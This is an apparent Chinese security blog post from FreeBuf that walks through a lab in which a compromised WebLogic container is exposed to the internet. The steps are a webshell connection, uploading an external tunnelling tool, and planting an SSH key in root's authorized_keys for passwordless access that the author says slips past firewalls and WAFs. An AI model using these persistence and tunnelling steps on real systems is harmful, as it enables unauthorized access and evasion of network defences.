接着上篇文章
https://www.freebuf.com/sectool/247698.html
Ubuntu 192.168.50.157
Kali linux 192.168.50.53
当拿到weblogic 服务器后需要对内网的某些端口转发到公网进行各种花式操作,此次我们转发的是22端口。
登陆到Ubuntu
service docker start #首先开启docker 服务
docker ps #查看当前docker 进行是否启动
发现进程为空、所以我们执行 docker ps -a 查看挂起的所有进程
使用docker start aa 启动挂起进行、也可以把ID号输全效果一样aad658f37233
再次使用docker ps 查看
可以看到进程已经启动、我们使用宿主机访问下 192.168.50.157:7001/console
到此基本可以确定环境没有问题、我们登陆到靶机上安装下ssh服务
使用docker exec -it aa /bin/bash 登陆到靶机shell下
apt-get install ssh #安装ssh服务
报错 提示要更新系统(更新的时候可能会很慢、建议大家修改更新源)
再次安装 apt-get install ssh
可以看到已经安装成功、使用service ssh start 开启22端口
按下Ctrl+d断开当前shell连接、在Ubuntu下抓取ens33接口流量方便后期分析
打开kali linux 进行攻击、因为上篇文章已经说了如何进行攻击 这次就不截图说明、直接在反弹后的shell 下进行操作
打开冰蝎进行连接
下载内网穿透工具解压后上传到根目录
https://www.ngrok.cc/sunny/linux_amd64.zip?v=2.1
然后打开http://www.ngrok.cc/_book/start/ngrok_linux.html看下使用方法
./sunny clientid 隧道id
隧道ID需要注册账号才能获取
运行内网穿透工具
传入公钥到/root/.ssh/authorized_keys下
使用ssh 免秘钥登录
去掉注释 重启服务 service ssh restart否则登录提示需要输入密码
ssh root@ vipgz4.idcfengye.com -p 11111
可以看到已经不需要输入密码直接可以进行登录
Weblogic环境只对外只开放了5556、7001 端口、而我们可以直接使用./sunny 进行内网穿透、无视防护墙、WAF,但是此方法容易被安全设备告警。
总结:此方法可以穿透任意端口、在项目中难免碰到内网端口限制死的问题,此方法可以图片端口限制。
没有什么难度、大神勿喷。
来源:freebuf.com 2020-08-26 18:47:03 by: system323
请登录后发表评论
注册